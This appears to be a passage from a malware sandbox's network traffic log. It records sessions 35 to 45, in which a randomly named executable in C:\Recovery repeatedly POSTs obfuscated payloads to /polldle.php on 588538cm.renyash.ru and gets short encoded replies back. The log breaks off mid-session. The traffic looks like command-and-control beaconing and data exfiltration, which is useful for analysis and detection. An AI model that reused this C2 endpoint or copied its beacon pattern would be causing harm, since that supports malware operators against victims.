                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                35192.168.2.449913104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:24.711364031 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:25.067357063 CET2504OUTData Raw: 58 5c 54 50 5a 48 5a 5b 54 5d 55 5a 50 5f 59 5d 50 57 5a 5d 57 50 50 58 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X\TPZHZ[T]UZP_Y]PWZ]WPPX[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#@,31$+?%":3%S4!-;?[(7%U%,4 !;[(5#X'/\/(
                                                                                Jan 11, 2025 23:33:25.152148008 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:25.411586046 CET807INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:25 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o57KXGLCRh8wdBXqgXgLzXw1UM2YMQXjyv%2B3PBhXgYKDovawo9p84T1iKopVP8c%2Fi5LxsigIYtu%2FMrz57TJzA48JEs2XzTXbF6zVlkrW7WPZQaAPYV7Hb%2B03G0mkquy4BFX42eUZ"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e4bfed81a13-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2795&min_rtt=1991&rtt_var=2355&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=173273&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                36192.168.2.449919104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:25.542560101 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:25.895539045 CET2504OUTData Raw: 58 51 51 57 5a 45 5a 51 54 5d 55 5a 50 5b 59 5d 50 57 5a 53 57 53 50 56 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XQQWZEZQT]UZP[Y]PWZSWSPV[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#@- 22$Z$"5$<-U#Z)Z;7^?7&3&T,'8^6\+#X'/\/
                                                                                Jan 11, 2025 23:33:25.987567902 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:26.227425098 CET806INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:26 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=StlWOufJki285L713t4Thjt9ldzRDnptQNvs0T%2FBUop9Sk5Cogz0lY%2BYQtWQxokXJBkwtajQ%2BGxb3IdcdyyRTjXGRGfHxj5nAuuCxmZJGJwVxwlfC2fWP8D7O9%2BcZdSjCZPuLYMn"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e51297d426b-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3985&min_rtt=2406&rtt_var=4060&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=97087&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                37192.168.2.449920104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:26.601970911 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                38192.168.2.449926104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:26.902194977 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 1608
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:27.254817963 CET1608OUTData Raw: 58 5f 54 52 5a 47 5a 5c 54 5d 55 5a 50 5c 59 5f 50 57 5a 5b 57 51 50 5b 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X_TRZGZ\T]UZP\Y_PWZ[WQP[[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU -#&]$"=]'#)/8')?4$#%.0^5+[<#X'/\/
                                                                                Jan 11, 2025 23:33:27.354954958 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:27.601699114 CET957INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:27 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E1VhDhew5t7FlVzezjaZgd8ZQi0OHjxZWaatfAcFjZZLkcSKq%2FGm8K8GcnXSNSDaBDIUEYazbE1tj9azoVr4RC1r%2F0AGc49ESdD%2BFPQx%2FGJS%2FdowunHDCocrQH6BRi2TqwZystfB"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e59be16efa1-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4697&min_rtt=1958&rtt_var=6212&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1927&delivery_rate=61159&cwnd=164&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 38 0d 0a 0e 11 2e 56 26 34 30 1e 2a 29 05 58 2e 16 3f 5b 2d 08 3c 5a 29 21 3a 5b 22 29 30 5c 26 0b 34 51 3c 03 21 45 2b 03 33 54 37 3d 22 1c 26 03 23 46 0c 1d 22 59 3e 01 27 08 31 02 30 5a 28 0d 29 01 26 0b 30 09 2a 37 2f 50 2a 3a 2a 00 22 5a 22 52 3f 21 39 18 28 36 2a 5b 3b 31 23 13 26 00 2e 51 0f 16 22 0d 36 0f 2f 01 34 5b 3b 5d 25 30 0d 1c 28 34 28 58 25 3a 0a 1b 3f 0d 04 5e 3c 31 3c 54 24 5b 3f 54 32 01 26 5d 3c 39 0a 0e 3f 3b 24 5c 23 0f 28 56 05 3f 5b 4d 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 98.V&40*)X.?[-<Z)!:[")0\&4Q<!E+3T7="&#F"Y>'10Z()&0*7/P*:*"Z"R?!9(6*[;1#&.Q"6/4[;]%0(4(X%:?^<1<T$[?T2&]<9?;$\#(V?[M0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                39192.168.2.449927104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:27.022962093 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:27.379795074 CET2504OUTData Raw: 58 51 51 50 5a 43 5a 5d 54 5d 55 5a 50 55 59 5e 50 56 5a 52 57 57 50 58 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XQQPZCZ]T]UZPUY^PVZRWWPX[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#- .E$(%"]3<1W %X/+X??2)94$"1'](5#X'/\/
                                                                                Jan 11, 2025 23:33:27.485744953 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:27.726777077 CET808INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:27 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R977o76D1x1hIKJZINH6C91WG3JN%2FwjKMOpKKAN7SmIEzogOy7yZT4NcI1PYRls4wDmiMJlh9zxocN0xLpw2kmR3Bc61FqOJa0je%2B%2BIXz%2BLlF1b%2BslKMErvTNIhpNh089lVjNlNV"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e5a895d78e1-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4308&min_rtt=2022&rtt_var=5331&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=71871&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                40192.168.2.449933104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:27.862638950 CET295OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:33:28.208184004 CET2504OUTData Raw: 58 50 54 50 5a 45 5a 5a 54 5d 55 5a 50 5a 59 5c 50 5d 5a 5c 57 51 50 5a 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XPTPZEZZT]UZPZY\P]Z\WQPZ[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU ,3!1($!%Y'" />-(?Z<#232U.$7623](#X'/\/<
                                                                                Jan 11, 2025 23:33:28.327708006 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:28.492438078 CET810INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:28 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0ZTMgSoYxdblr1TZHGdvIOWu3wLucmghba%2F%2FYIhK0qDXc%2B8zGjTpT%2Fk7C%2BhzL7HBSoQa6JRzxcW7dKTb38Tb%2BkQlx6oB8fhKfxgyyL7wTridlomXJeuzC6XT4oHX5kCpRtAkPBPp"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e5fc93c7d18-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4570&min_rtt=2000&rtt_var=5891&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=64696&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                41192.168.2.449939104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:28.654609919 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:29.010983944 CET2504OUTData Raw: 5d 5e 51 52 5a 47 5f 5f 54 5d 55 5a 50 5e 59 5f 50 52 5a 53 57 52 50 5d 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]^QRZG__T]UZP^Y_PRZSWRP][\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#-052&=]$7,)X;?<<+%32.462++#X'/\/,
                                                                                Jan 11, 2025 23:33:29.106998920 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:29.346067905 CET806INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:29 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ni7hcf3pXqN0R3%2BvRzx005f6GSFkwVHIcBzxnDyU5ozGKOrvTTG5oDmL7rfChQsvVurVDV5nG7XKGst1CFqW9%2BKLQnaHm%2FAAX%2FmT806JkZ28g5I1hcGL0Cgu42D9SUbU4mbXelUG"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e64ac4b43d5-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4253&min_rtt=1746&rtt_var=5669&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=66960&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                42192.168.2.449940104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:29.484366894 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:29.832988977 CET2504OUTData Raw: 5d 5e 51 55 5a 40 5a 5f 54 5d 55 5a 50 59 59 5f 50 5c 5a 5e 57 51 50 5b 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]^QUZ@Z_T]UZPYY_P\Z^WQP[[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#F.@%8123<) 1Z8(313%94[6"+%#X'/\/0
                                                                                Jan 11, 2025 23:33:29.937923908 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:30.204200029 CET803INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:30 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5%2FGVUsT1jcoKEQzTy7herYZ7GS2Gxz00zSvrDOsuCKR1iTehAW4r8qGjUtCff2mETCMIi3N4V9LKEFFZZRuOqyELBKlxCkDfZgGYEOjdAbfzB4RrpG%2FT44YytGPGAH9fSyTqi6iJ"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e69d94543ee-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=7827&min_rtt=1735&rtt_var=12836&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=28923&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                43192.168.2.449947104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:30.392554045 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:30.739222050 CET2504OUTData Raw: 5d 5e 51 54 5a 46 5a 51 54 5d 55 5a 50 5f 59 5d 50 52 5a 5f 57 5d 50 5f 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]^QTZFZQT]UZP_Y]PRZ_W]P_[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#.3-2$"9_%/9S7,5Y8$<+& 2.#5T3X*%#X'/\/(
                                                                                Jan 11, 2025 23:33:30.851397991 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:31.015234947 CET803INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:30 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sYOw9NVuCpeuTdBp3ap%2FTGFvLhnSkAupqBAKVyiQ2b6BLOCNVXFrZRoscQNwoqmMG2Ny5c%2Fpw1y6CSU5pe73HTH6OBCpDPyz5q2pA4au9scuQBKWe32IHFxGPfEaFcoivbWbgKKL"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e6f8af24350-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3204&min_rtt=1765&rtt_var=3540&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=109948&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                44192.168.2.449955104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:31.150085926 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:31.504878998 CET2504OUTData Raw: 5d 59 54 51 5f 45 5a 5d 54 5d 55 5a 50 5a 59 5d 50 54 5a 59 57 57 50 5a 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]YTQ_EZ]T]UZPZY]PTZYWWPZ[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU -U5&(8&2\$2#9Y8'Y(/ $#-.3#2+5#X'/\/<
                                                                                Jan 11, 2025 23:33:31.599276066 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:31.761110067 CET791INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:31 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uqJrAWu6Jt9Pwhd443MYS8CNMPNg%2BSq4UqjlduRnk8J26NuTklGZAzYDLsRtbBzxM63z7i3smVjP7pQX7hpWu8%2F2wT5K3uOOjuEjHZju21HCrjM7lvALlmFSfjHA5lEAvzY%2BiQ6l"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e743d0241ef-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2986&min_rtt=1682&rtt_var=3239&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=120481&cwnd=197&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Jan 11, 2025 23:33:31.847834110 CET14INData Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                45192.168.2.449958104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:32.292885065 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
